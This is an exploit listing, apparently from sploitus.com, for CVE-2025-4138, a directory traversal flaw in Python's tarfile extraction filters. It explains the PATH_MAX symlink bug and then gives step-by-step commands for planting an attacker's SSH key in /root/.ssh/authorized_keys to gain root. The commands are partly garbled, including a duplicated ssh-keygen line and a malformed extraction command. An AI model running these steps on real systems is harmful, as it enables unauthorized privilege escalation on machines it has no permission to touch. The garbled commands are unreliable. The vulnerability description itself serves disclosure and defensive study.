## https://sploitus.com/exploit?id=68A89ED4-479F-5405-A2BD-7B495BAE4D0B
# CVE-2025-4138 (Python Tarfile module Directory Traversal Vulnerability With overflow crossed Directory )
Impact : Privilege escalation
----
Working :
Python's TarFile.extractall() and TarFile.extract() methods support a feature that allows a filter to be set to improve the safety of using these methods. Python's standard library provides two implementations **tar_filter ("tar")** and **data_filter** ("data"), each with differing checks to improve the safety of tarfile extraction.
A bug exists when processing a path with symlinks is shorter than **PATH_MAX**, but longer than **PATH_MAX** when the symlinks are substituted by os.path.realpath(). Any symlinks that are beyond PATH_MAX are not expanded.
os.path.realpath() is used by the "tar" and "data" filter to validate the path, but no error is thrown if PATH_MAX is exceeded. Later during extractall() or extract() the paths are used without passing them through os.path.realpath().
Reference : https://github.com/google/security-research/security/advisories/GHSA-hgqp-3mmf-7h8f
-----
How To USed PoC :
1. We are Going to Paste our ssh public key over **/root/.ssh/authorized_keys** for privilege escalation .
2. Follow Below Commands for abuse
```
ssh-keygen -t ed25519 -f ssh-keygen -t ed25519 -f any
mkdir test
mv any.pub authorized_keys
cp authorized_keys /test
cd test
#Put your public key file name (authorized_keys)
python3 exploit.py
(file.tar) ~ generated
# Now using Python3
sudo python3 tar -xvf file.tar
#login
chmod 600 any
ssh -i any user@ip
```